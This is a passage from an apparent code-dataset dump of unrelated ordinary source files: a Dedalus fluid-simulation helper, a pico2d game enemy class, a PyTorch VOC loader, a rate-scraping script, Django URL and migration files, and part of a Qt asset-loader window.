uz_anal,\n }\n return analyticals[name]\n\ndef get_sponge(domain, params):\n sponge_strength = params['SPONGE_STRENGTH']\n zmax = params['ZMAX']\n damp_start = params['SPONGE_START']\n z = domain.grid(1)\n\n # sponge field\n sponge = domain.new_field()\n sponge.meta['x']['constant'] = True\n sponge['g'] = sponge_strength * np.maximum(\n 1 - (z - zmax)**2 / (damp_start - zmax)**2,\n np.zeros(np.shape(z)))\n return sponge\n\n###\n### IC\n###\n\ndef zero_ic(solver, domain, params):\n ux = solver.state['ux']\n uz = solver.state['uz']\n P = solver.state['P']\n rho = solver.state['rho']\n gshape = domain.dist.grid_layout.global_shape(scales=1)\n\n P['g'] = np.zeros(gshape)\n ux['g'] = np.zeros(gshape)\n uz['g'] = np.zeros(gshape)\n rho['g'] = np.zeros(gshape)\n\ndef bg_ic(solver, domain, params):\n ux = solver.state['ux']\n uz = solver.state['uz']\n P = solver.state['P']\n rho = solver.state['rho']\n gshape = domain.dist.grid_layout.global_shape(scales=1)\n z = domain.grid(1)\n\n ux['g'] = np.zeros(gshape)\n uz['g'] = np.zeros(gshape)\n rho['g'] = params['RHO0'] * np.exp(-z / params['H'])\n P['g'] = params['RHO0'] * (np.exp(-z / params['H']) - 1) *\\\n params['G'] * params['H']\n\n###\n### PROBLEM SETUP\n###\n\ndef _non_ns_bc(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc(\n 'left(dz(uz)) = - KZ * A * sin(KX * x - omega * t - 1 / (2 * KZ * H))',\n condition='nx != 0')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('left(uz) = 0', condition='nx == 0')\n\ndef _non_ns_p_bc(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(P) = -omega * RHO0 * A * KZ / KX ** 2 *' +\n 'cos(KX * x - omega * t - 1 / (2 * KZ * H))', condition='nx != 0')\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('right(uz) = 0')\n\ndef _non_ns_dp_bc(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(dz(P)) = omega * RHO0 * A * KZ**2 / KX ** 2 *' +\n 'sin(KX * x - omega * t + 1 / (KZ * H))', condition='nx != 0')\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('right(uz) = 0')\n\ndef _ns_bc(problem):\n ''' BCs for NS, dirichlet '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('left(uz) = A * cos(KX * x - omega * t)')\n problem.add_bc(\n 'left(ux) = -KZ / KX * A * cos(KX * x - 
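# Hedged usage sketch for get_omega / get_vph above; the parameter values
# here are illustrative only. The dispersion relation implemented there is
# omega^2 = (g / H) * kx^2 / (kx^2 + kz^2 + 1 / (4 H^2)).
import numpy as np
g, h, kx, kz = 10.0, 1.0, 2 * np.pi, -2 * np.pi
omega = get_omega(g, h, kx, kz)
vph_x, vph_z = get_vph(g, h, kx, kz)   # phase-velocity components
print(omega, vph_x, vph_z)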
omega * t - 1 / (2 * KZ * H))')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('right(ux) = 0')\n\ndef _ns_bc2(problem):\n ''' BCs for NS, dz(uz_z) '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('left(dz(uz_z)) = -KZ**2 * A * cos(KX * x - omega * t - 1 /'\n + '(KZ * H))', condition='nx != 0')\n problem.add_bc(\n 'left(ux) = -KZ / KX * A * cos(KX * x - omega * t - 1 / (2 * KZ * H))')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('left(uz) = 0', condition='nx == 0')\n problem.add_bc('right(ux) = 0')\n\ndef _ns_dp_bc(problem):\n ''' BCs for NS, pressure '''\n problem.add_bc('left(dz(P)) = omega * RHO0 * A * KZ**2 / KX ** 2 *' +\n 'sin(KX * x - omega * t + 1 / (KZ * H))', condition='nx != 0')\n problem.add_bc('left(dz(uz_z)) = -KZ**2 * A * cos(KX * x - omega * t - 1 /'\n + '(KZ * H))', condition='nx != 0')\n problem.add_bc('left(uz) = 0', condition='nx == 0')\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('right(uz) = 0')\n problem.add_bc('right(ux) = 0')\n\ndef _ns_bc_gradual(problem):\n ''' BCs for non-NS '''\n problem.add_bc('left(P) = 0', condition='nx == 0')\n problem.add_bc('left(uz) = A * cos(KX * x - omega * t) * (1 - exp(-t))')\n problem.add_bc(\n 'left(ux) = -KZ / KX * A * cos(KX * x - omega * t - 1 / (2 * KZ * H))'\n + ' * (1 - exp(-t))')\n problem.add_bc('right(uz) = 0', condition='nx != 0')\n problem.add_bc('right(ux) = 0')\n\ndef _sponge_lin(problem, domain, params, bc):\n '''\n puts a -gamma(z) * q damping on all dynamical variables, where gamma(z)\n is the sigmoid: damping * exp(steep * (z - z_sigmoid)) / (1 + exp(...))\n\n w/o nonlin terms\n '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + dz(uz) = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= 0')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n '= 0')\n bc(problem)\n\ndef sponge_lin(problem, domain, params):\n _sponge_lin(problem, domain, params, _non_ns_bc)\n\ndef sponge_lin_p_bc(problem, domain, params):\n _sponge_lin(problem, domain, params, _non_ns_dp_bc)\n\ndef sponge_lin_dp_bc(problem, domain, params):\n _sponge_lin(problem, domain, params, _non_ns_p_bc)\n\ndef _sponge_nonlin(problem, domain, params, bc):\n ''' sponge zone velocities w nonlin terms '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + dz(uz) = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= -ux * dx(rho) - uz * dz(rho)')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n '= 0')\n\n bc(problem)\n\ndef sponge_nonlin(problem, domain, params):\n _sponge_nonlin(problem, domain, params, _non_ns_bc)\n\ndef sponge_nonlin_dp_bc(problem, domain, params):\n _sponge_nonlin(problem, domain, params, _non_ns_p_bc)\n\ndef _ns_sponge_lin(problem, domain, params, bc):\n ''' navier-stokes sponge layer linear '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + uz_z = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= 0')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n ' - NU * (dx(dx(ux)) + dz(ux_z))' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n ' - NU * (dx(dx(uz)) + 
dz(uz_z))' +\n '= 0')\n problem.add_equation('dz(ux) - ux_z = 0')\n problem.add_equation('dz(uz) - uz_z = 0')\n bc(problem)\n\ndef _ns_sponge_nonlin(problem, domain, params, bc):\n ''' sponge zone velocities w nonlin terms '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + uz_z = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= -ux * dx(rho) - uz * dz(rho)')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n ' - NU * (dx(dx(ux)) + dz(ux_z))' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n ' - NU * (dx(dx(uz)) + dz(uz_z))' +\n '= 0')\n problem.add_equation('dz(ux) - ux_z = 0')\n problem.add_equation('dz(uz) - uz_z = 0')\n bc(problem)\n\ndef ns_sponge_lin(problem, domain, params):\n _ns_sponge_lin(problem, domain, params, _ns_bc)\n\ndef ns_sponge_lin_gradual(problem, domain, params):\n _ns_sponge_lin(problem, domain, params, _ns_bc_gradual)\n\ndef ns_sponge_nonlin(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_bc)\n\ndef ns_sponge_nonlin2(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_bc2)\n\ndef ns_sponge_nonlin_p_bc(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_p_bc)\n\ndef ns_sponge_nonlin_gradual(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_bc_gradual)\n\ndef default_problem(problem):\n \"\"\" TODO needs updating \"\"\"\n problem.add_equation(\"dx(ux) + dz(uz) = 0\")\n problem.add_equation(\"dt(rho) - rho0 * uz / H = 0\")\n problem.add_equation(\n \"dt(ux) + dx(P) / rho0 = 0\")\n problem.add_equation(\n \"dt(uz) + dz(P) / rho0 + rho * g / rho0 = 0\")\n\n problem.add_bc(\"left(P) = 0\", condition=\"nx == 0\")\n problem.add_bc(\"left(uz) = A * cos(KX * x - omega * t)\")\n\n###\n### SOLVER SETUP\n###\n\ndef _get_solver(setup_problem, params, variables):\n ''' get solver for given variables '''\n x_basis = de.Fourier('x',\n params['N_X'],\n interval=(0, params['XMAX']),\n dealias=3/2)\n z_basis = de.Chebyshev('z',\n params['N_Z'],\n interval=(0, params['ZMAX']),\n dealias=3/2)\n domain = de.Domain([x_basis, z_basis], np.float64)\n z = domain.grid(1)\n\n problem = de.IVP(domain, variables=variables)\n problem.parameters['L'] = params['XMAX']\n problem.parameters['g'] = params['G']\n problem.parameters['H'] = params['H']\n problem.parameters['A'] = params['A']\n problem.parameters['KX'] = params['KX']\n problem.parameters['KZ'] = params['KZ']\n problem.parameters['NU'] = params['NU']\n problem.parameters['RHO0'] = params['RHO0']\n problem.parameters['omega'] = params['OMEGA']\n\n # rho0 stratification\n rho0 = domain.new_field()\n rho0.meta['x']['constant'] = True\n rho0['g'] = params['RHO0'] * np.exp(-z / params['H'])\n problem.parameters['rho0'] = rho0\n\n setup_problem(problem, domain, params)\n\n # Build solver\n solver = problem.build_solver(de.timesteppers.RK222)\n solver.stop_sim_time = params['T_F']\n solver.stop_wall_time = np.inf\n solver.stop_iteration = np.inf\n return solver, domain\n\ndef get_solver(setup_problem, params):\n return _get_solver(setup_problem,\n params,\n variables=['P', 'rho', 'ux', 'uz'])\n\ndef ns_get_solver(setup_problem, params):\n return _get_solver(setup_problem,\n params,\n variables=['P', 'rho', 'ux', 'uz', 'uz_z', 'ux_z'])\n\n###\n### ENTRY POINTS\n###\n\ndef run_strat_sim(get_solver, setup_problem, set_ICs, name, params):\n snapshots_dir = SNAPSHOTS_DIR % name\n try:\n os.makedirs(snapshots_dir)\n except 
FileExistsError:\n print('snapshots already exist, exiting...')\n return\n logger = logging.getLogger(name)\n\n solver, domain = get_solver(setup_problem, params)\n\n # Initial conditions\n set_ICs(solver, domain, params)\n\n cfl = CFL(solver,\n initial_dt=params['DT'],\n cadence=10,\n max_dt=params['DT'],\n threshold=0.10)\n cfl.add_velocities(('ux', 'uz'))\n snapshots = solver.evaluator.add_file_handler(\n snapshots_dir,\n sim_dt=params['T_F'] / params['NUM_SNAPSHOTS'])\n snapshots.add_system(solver.state)\n\n # Main loop\n logger.info('Starting sim...')\n while solver.ok:\n cfl_dt = cfl.compute_dt() if params.get('USE_CFL') else params['DT']\n solver.step(cfl_dt)\n curr_iter = solver.iteration\n\n if curr_iter % int((params['T_F'] / params['DT']) /\n params['NUM_SNAPSHOTS']) == 0:\n logger.info('Reached time %f out of %f, timestep %f vs max %f',\n solver.sim_time,\n solver.stop_sim_time,\n cfl_dt,\n params['DT'])\n\ndef load(get_solver, setup_problem, name, params):\n dyn_vars = ['uz', 'ux', 'rho', 'P']\n snapshots_dir = SNAPSHOTS_DIR % name\n filename = '{s}/{s}_s1/{s}_s1_p0.h5'.format(s=snapshots_dir)\n\n if not os.path.exists(snapshots_dir):\n raise ValueError('No snapshots dir \"%s\" found!' % snapshots_dir)\n\n solver, domain = get_solver(setup_problem, params)\n z = domain.grid(1, scales=params['INTERP_Z'])\n\n with h5py.File(filename, mode='r') as dat:\n sim_times = np.array(dat['scales']['sim_time'])\n # we let the file close before trying to reopen it again in load\n\n # load into state_vars\n state_vars = defaultdict(list)\n for idx in range(len(sim_times)):\n solver.load_state(filename, idx)\n\n for varname in dyn_vars:\n values = solver.state[varname]\n values.set_scales((params['INTERP_X'], params['INTERP_Z']),\n keep_data=True)\n state_vars[varname].append(np.copy(values['g']))\n # cast to np arrays\n for key in state_vars.keys():\n state_vars[key] = np.array(state_vars[key])\n\n state_vars['rho'] += params['RHO0'] * np.exp(-z / params['H'])\n state_vars['P'] += params['RHO0'] * (np.exp(-z / params['H']) - 1) *\\\n params['G'] * params['H']\n state_vars['rho1'] = state_vars['rho'] - params['RHO0'] *\\\n np.exp(-z / params['H'])\n state_vars['P1'] = state_vars['P'] -\\\n params['RHO0'] * (np.exp(-z / params['H']) - 1) *\\\n params['G'] * params['H']\n\n state_vars['E'] = state_vars['rho'] * \\\n (state_vars['ux']**2 + state_vars['uz']**2) / 2\n state_vars['F_z'] = state_vars['uz'] * (\n state_vars['rho'] * (state_vars['ux']**2 + state_vars['uz']**2)\n + state_vars['P'])\n return sim_times, domain, state_vars\n\ndef plot(get_solver, setup_problem, name, params):\n slice_suffix = '(x=0)' # slice suffix\n SAVE_FMT_STR = 't_%d.png'\n snapshots_dir = SNAPSHOTS_DIR % name\n path = '{s}/{s}_s1'.format(s=snapshots_dir)\n matplotlib.rcParams.update({'font.size': 6})\n plot_vars = ['uz', 'ux']\n z_vars = ['F_z', 'E'] # sum these over x\n slice_vars = ['%s%s' % (i, slice_suffix)\n for i in ['uz', 'ux', 'rho1', 'P1']]\n n_cols = 3\n n_rows = 3\n plot_stride = 2\n\n if os.path.exists('%s.mp4' % name):\n print('%s.mp4 already exists, not regenerating' % name)\n return\n\n sim_times, domain, state_vars = load(get_solver, setup_problem, name, params)\n\n x = domain.grid(0, scales=params['INTERP_X'])\n z = domain.grid(1, scales=params['INTERP_Z'])\n xmesh, zmesh = quad_mesh(x=x[:, 0], y=z[0])\n\n for var in z_vars:\n state_vars[var] = np.sum(state_vars[var], axis=1)\n for var in slice_vars:\n state_vars[var] = state_vars[var.replace(slice_suffix, '')][:, 0, :]\n\n for t_idx, sim_time in 
list(enumerate(sim_times))[::plot_stride]:\n fig = plt.figure(dpi=200)\n\n idx = 1\n for var in plot_vars:\n axes = fig.add_subplot(n_rows, n_cols, idx, title=var)\n\n var_dat = state_vars[var]\n p = axes.pcolormesh(xmesh,\n zmesh,\n var_dat[t_idx].T,\n vmin=var_dat.min(), vmax=var_dat.max())\n axes.axis(pad_limits(xmesh, zmesh))\n cb = fig.colorbar(p, ax=axes)\n cb.ax.set_yticklabels(cb.ax.get_yticklabels(), rotation=30)\n plt.xticks(rotation=30)\n plt.yticks(rotation=30)\n idx += 1\n for var in z_vars + slice_vars:\n axes = fig.add_subplot(n_rows, n_cols, idx, title=var)\n var_dat = state_vars[var]\n z_pts = (zmesh[1:, 0] + zmesh[:-1, 0]) / 2\n p = axes.plot(var_dat[t_idx], z_pts)\n if slice_suffix in var:\n p = axes.plot(\n get_analytical_sponge(var.replace(slice_suffix, ''),\n z_pts,\n sim_time,\n params),\n z_pts)\n plt.xticks(rotation=30)\n plt.yticks(rotation=30)\n xlims = [var_dat.min(), var_dat.max()]\n axes.set_xlim(*xlims)\n p = axes.plot(xlims, [params['SPONGE_START']] * len(xlims), 'r--')\n idx += 1\n\n fig.suptitle(\n 'Config: %s (t=%.2f, kx=%.2f, kz=%.2f, omega=%.2f)' %\n (name, sim_time, params['KX'], params['KZ'], params['OMEGA']))\n fig.subplots_adjust(hspace=0.5, wspace=0.6)\n savefig = SAVE_FMT_STR % (t_idx // plot_stride)\n plt.savefig('%s/%s' % (path, savefig))\n print('Saved %s/%s' % (path, savefig))\n plt.close()\n os.system('ffmpeg -y -framerate 12 -i %s/%s %s.mp4' %\n (path, SAVE_FMT_STR, name))\n","sub_path":"sims_old/2d_2_strat_drop_terms/strat_helper.py","file_name":"strat_helper.py","file_ext":"py","file_size_in_byte":17549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407217945","text":"from pico2d import *\n\nimport math\n\nimport map_stage_1\n\nimport game_world\n\nimport game_framework\n\nimport enemy_die\n\nclass enemy:\n image = None\n\n def __init__(self, show = 0):\n self.x = -100\n self.y = 300\n self.hp = 10\n self.radians = 0.0\n self.head = 0\n self.frame = 0\n self.reflect = ''\n self.count = show\n self.showtime = get_time()\n self.size = 50\n if enemy.image is None:\n enemy.image = load_image('enemy_image//stage1_pig1.png')\n\n def update(self):\n if self.hp < 0:\n game_world.remove_object(self)\n die = enemy_die.die(self.x,self.y,50,50)\n game_framework.GameState.money += 10\n game_world.add_object(die, 1)\n if self.count == 0 :\n if self.x > 0 :\n self.frame = (self.frame + 14 * game_framework.frame_time) % 7\n\n self.x = self.x + (100 * math.cos(self.radians)) * game_framework.frame_time\n self.y = self.y + (100 * math.sin(self.radians)) * game_framework.frame_time\n\n if map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 1:\n self.radians = 3.14\n self.reflect = \"hv\"\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 2:\n self.radians = -1.57\n self.reflect = ''\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 3:\n self.radians = 0\n self.reflect = ''\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 4:\n self.radians = 1.57\n self.reflect = ''\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 5:\n game_world.remove_object(self)\n game_framework.GameState.life -= 1\n\n else :\n self.x = self.x + (100 * math.cos(self.radians)) * game_framework.frame_time\n self.y = self.y + (100 * math.sin(self.radians)) * game_framework.frame_time\n\n else :\n if self.count < get_time() - self.showtime:\n self.count = 0\n\n def draw(self):\n self.image.clip_composite_draw(0, 50 + 50 * 
int(self.frame), 50, 50, self.radians, self.reflect, self.x, self.y, self.size, self.size)\n\n def get_bb(self):\n return self.x, self.y","sub_path":"2DGP project/2DGP 게임 제작/enemy_stage_1.py","file_name":"enemy_stage_1.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40336069","text":"import torch.utils.data as data\nimport os.path\nimport numpy as np\nimport matplotlib.cm\nfrom PIL import Image\n\nclass VOC(data.Dataset):\n \"\"\"\n Pascal VOC 2012 Dataset class. You can get the data from: \n http://host.robots.ox.ac.uk/pascal/VOC/voc2012/index.html#devkit\n\n Args:\n root (str): Path to data folder.\n transform (object): Data transforms to apply to images.\n target_transform (object): Data transforms to apply to labels.\n image_set (str): Which split to load, either 'train or val'\n\n Example:\n >>> from xt_cvdata.transforms import ToLabel, Relabel\n >>> from torchvision import transforms\n >>> \n >>> data_transforms = transforms.Compose([\n >>> transforms.ToTensor()\n >>> ])\n >>>\n >>> # These custom transforms are in xt_cvdata.transforms\n >>> label_transforms = transforms.Compose([\n >>> ToLabel(),\n >>> Relabel(255, 21)\n >>> ])\n >>> \n >>> dataset = xcvd.datasets.VOC(\n '/nasty/data/common/VOC2012', \n transform=data_transforms, \n target_transform=label_transforms\n )\n \"\"\"\n def __init__(self, root, transform=None, target_transform=None, image_set='train'):\n self.root = root\n self.transform = transform\n self.target_transform = target_transform\n\n self._image_set = image_set\n self._imsetpath = os.path.join(self.root, 'ImageSets', 'Segmentation', '%s.txt')\n self._annopath = os.path.join(self.root, 'SegmentationClass', '%s.png')\n self._impath = os.path.join(self.root, 'JPEGImages', '%s.jpg')\n \n with open(self._imsetpath % self._image_set) as f:\n self.ids = f.readlines()\n self.ids = [x.strip('\\n') for x in self.ids]\n\n self.labels = [\n 'background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat',\n 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor', 'void'\n ]\n self.cmap = self._color_map()\n\n def __getitem__(self, index):\n img_id = self.ids[index]\n target = Image.open(self._annopath % img_id)\n img = Image.open(self._impath % img_id).convert('RGB')\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n \n return img, target\n\n def __len__(self):\n return len(self.ids)\n\n def _color_map(self, normalized=True, base_map_name='tab20'):\n \"\"\"\n Custom Colormap for the labels.\n \"\"\"\n\n base_map = matplotlib.cm.get_cmap(base_map_name, 22).colors\n cmap = np.zeros_like(base_map)\n cmap[0,-1] = 1\n cmap[1:-1] = base_map[:20]\n cmap[-1] = [1, 1, 1, 1]\n\n return matplotlib.colors.ListedColormap(cmap)\n \n","sub_path":"xt_cvdata/datasets/voc.py","file_name":"voc.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"216261830","text":"import pandas as pd\nimport requests\nfrom requests.exceptions import RequestException\n\n\ndef main():\n html = get_html('http://www.chinamoney.com.cn/r/cms/www/chinamoney/data/currency/bk-lpr.json')\n data = get_content(html)\n df = pd.DataFrame(data)\n print(df)\n # res = sendMail.send_email('LRU利率', df.to_html())\n # print(res)\n # 
print(html['data']['showDateCN'])\n\n\ndef get_content(html):\n content = []\n data = {\n 'date': html['data']['showDateCN'],\n }\n for i in html['records']:\n data[i['termCode']] = i['shibor'] + '%'\n content.append(data)\n return content\n\n\ndef get_html(url):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/90.0.4430.212 Safari/537.36 \"\n }\n try:\n r = requests.get(url, headers=headers)\n if r.status_code == 200:\n # r.encoding = 'utf-8'\n return r.json()\n else:\n return None\n except RequestException:\n return None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/爬取LRU利率.py","file_name":"爬取LRU利率.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280497841","text":"'''\nCreated on 2012-10-1\n\n'''\nfrom django.conf.urls.defaults import patterns, url\n\n\nurlpatterns = patterns('utils.views',\n\n url(r'^initialization/', 'initialization'),\n \n url(r'^cleanupData/', 'cleanupDataBase'),\n \n url(r'^initProvince/', 'WriteLoctionJsonToDatabase'),\n \n url(r'^initContentIndex/', 'initContentIndex')\n \n)\n","sub_path":"utils/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431187140","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('evenementen', '0002_evenement_intro'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aanmelding',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('voornaam', models.CharField(max_length=200)),\n ('achternaam', models.CharField(max_length=200)),\n ('evenement', models.ForeignKey(to='evenementen.Evenement')),\n ],\n ),\n ]\n","sub_path":"src/evenementen/migrations/0003_aanmelding.py","file_name":"0003_aanmelding.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"311140968","text":"import os\nimport sys\nimport itertools\n\nfrom ...vendor.Qt import QtWidgets, QtCore\nfrom ... import api\nfrom .. import lib\n\n\nself = sys.modules[__name__]\nself._window = None\n\n# Store previous results from api.ls()\nself._cache = list()\nself._use_cache = False\n\n# Custom roles\nAssetRole = QtCore.Qt.UserRole + 1\nSubsetRole = QtCore.Qt.UserRole + 2\n\n\nclass Window(QtWidgets.QDialog):\n \"\"\"Basic asset loader interface\n\n _________________________________________\n | |\n | Assets |\n | _____________________________________ |\n | | | | |\n | | Asset 1 | Subset 1 | |\n | | Asset 2 | Subset 2 | |\n | | ... | ... 
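# Hedged usage sketch for the LPR scraper above: get_html returns the parsed
# JSON payload (or None on failure) and get_content flattens the per-term
# records; the exact termCode keys depend on the live response.
html = get_html('http://www.chinamoney.com.cn/r/cms/www/chinamoney/data/currency/bk-lpr.json')
if html is not None:
    print(get_content(html))   # e.g. [{'date': ..., '<termCode>': '<rate>%'}]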
| |\n | | | | |\n | | | | |\n | | | | |\n | | | | |\n | | | | |\n | | | | |\n | |__________________|__________________| |\n | _____________________________________ |\n | | | |\n | | Load | |\n | |_____________________________________| |\n |_________________________________________|\n\n \"\"\"\n\n def __init__(self, parent=None):\n super(Window, self).__init__(parent)\n self.setWindowTitle(\"Asset Loader\")\n self.setFocusPolicy(QtCore.Qt.StrongFocus)\n\n body = QtWidgets.QWidget()\n footer = QtWidgets.QWidget()\n\n container = QtWidgets.QWidget()\n\n assets = QtWidgets.QListWidget()\n subsets = QtWidgets.QListWidget()\n\n # Enable loading many subsets at once\n subsets.setSelectionMode(subsets.ExtendedSelection)\n\n layout = QtWidgets.QHBoxLayout(container)\n layout.addWidget(assets)\n layout.addWidget(subsets)\n layout.setContentsMargins(0, 0, 0, 0)\n\n options = QtWidgets.QWidget()\n layout = QtWidgets.QGridLayout(options)\n layout.setContentsMargins(0, 0, 0, 0)\n\n autoclose_checkbox = QtWidgets.QCheckBox(\"Close after load\")\n autoclose_checkbox.setCheckState(QtCore.Qt.Checked)\n layout.addWidget(autoclose_checkbox, 1, 0)\n\n layout = QtWidgets.QVBoxLayout(body)\n layout.addWidget(container)\n layout.addWidget(options, 0, QtCore.Qt.AlignLeft)\n layout.setContentsMargins(0, 0, 0, 0)\n\n load_button = QtWidgets.QPushButton(\"Load\")\n refresh_button = QtWidgets.QPushButton(\"Refresh\")\n stop_button = QtWidgets.QPushButton(\"Searching..\")\n stop_button.setToolTip(\"Click to stop searching\")\n message = QtWidgets.QLabel()\n message.hide()\n\n layout = QtWidgets.QVBoxLayout(footer)\n layout.addWidget(load_button)\n layout.addWidget(stop_button)\n layout.addWidget(refresh_button)\n layout.addWidget(message)\n layout.setContentsMargins(0, 0, 0, 0)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(body)\n layout.addWidget(footer)\n\n self.data = {\n \"state\": {\n \"running\": False,\n },\n \"button\": {\n \"load\": load_button,\n \"stop\": stop_button,\n \"autoclose\": autoclose_checkbox,\n },\n \"model\": {\n \"assets\": assets,\n \"subsets\": subsets,\n },\n \"label\": {\n \"message\": message,\n }\n }\n\n load_button.clicked.connect(self.on_load_pressed)\n stop_button.clicked.connect(self.on_stop_pressed)\n refresh_button.clicked.connect(self.on_refresh_pressed)\n assets.currentItemChanged.connect(self.on_assetschanged)\n subsets.currentItemChanged.connect(self.on_subsetschanged)\n\n # Defaults\n self.resize(320, 350)\n\n load_button.hide()\n stop_button.setFocus()\n\n def keyPressEvent(self, event):\n \"\"\"Delegate keyboard events\"\"\"\n\n if event.key() == QtCore.Qt.Key_Return:\n return self.on_enter()\n\n def on_enter(self):\n self.on_load_pressed()\n\n def on_assetschanged(self, *args):\n assets_model = self.data[\"model\"][\"assets\"]\n subsets_model = self.data[\"model\"][\"subsets\"]\n\n subsets_model.clear()\n\n asset_item = assets_model.currentItem()\n\n # The model is empty\n if asset_item is None:\n return\n\n asset = asset_item.data(AssetRole)\n\n # The model contains an empty item\n if asset is None:\n return\n\n for subset in asset[\"subsets\"]:\n item = QtWidgets.QListWidgetItem(subset[\"name\"])\n item.setData(QtCore.Qt.ItemIsEnabled, True)\n item.setData(SubsetRole, subset)\n subsets_model.addItem(item)\n\n def on_subsetschanged(self, *args):\n button = self.data[\"button\"][\"load\"]\n item = self.data[\"model\"][\"assets\"].currentItem()\n button.setEnabled(item.data(QtCore.Qt.ItemIsEnabled))\n\n def refresh(self):\n \"\"\"Load assets from disk and add 
them to a QListView\n\n This method runs part-asynchronous, in that it blocks\n when busy, but takes brief intermissions between each\n asset found so as to lighten the load off of disk, and\n to enable the artist to abort searching once the target\n asset has been found.\n\n \"\"\"\n\n assets_model = self.data[\"model\"][\"assets\"]\n assets_model.clear()\n\n state = self.data[\"state\"]\n\n has = {\"assets\": False}\n\n module = sys.modules[__name__]\n if module._use_cache:\n print(\"Using cache..\")\n iterators = iter(module._cache)\n\n else:\n print(\"Reading from disk..\")\n assets = api.ls(os.path.join(api.registered_root(), \"assets\"))\n film = api.ls(os.path.join(api.registered_root(), \"film\"))\n iterators = itertools.chain(assets, film)\n\n def on_next():\n if not state[\"running\"]:\n return on_finished()\n\n try:\n asset = next(iterators)\n\n # Cache for re-use\n if not module._use_cache:\n module._cache.append(asset)\n\n except StopIteration:\n return on_finished()\n\n has[\"assets\"] = True\n\n item = QtWidgets.QListWidgetItem(asset[\"name\"])\n item.setData(QtCore.Qt.ItemIsEnabled, True)\n item.setData(AssetRole, asset)\n assets_model.addItem(item)\n\n lib.defer(25, on_next)\n\n def on_finished():\n state[\"running\"] = False\n module._use_cache = True\n\n if not has[\"assets\"]:\n item = QtWidgets.QListWidgetItem(\"No assets found\")\n item.setData(QtCore.Qt.ItemIsEnabled, False)\n assets_model.addItem(item)\n\n assets_model.setCurrentItem(assets_model.item(0))\n assets_model.setFocus()\n self.data[\"button\"][\"load\"].show()\n self.data[\"button\"][\"stop\"].hide()\n\n state[\"running\"] = True\n lib.defer(25, on_next)\n\n def on_refresh_pressed(self):\n # Clear 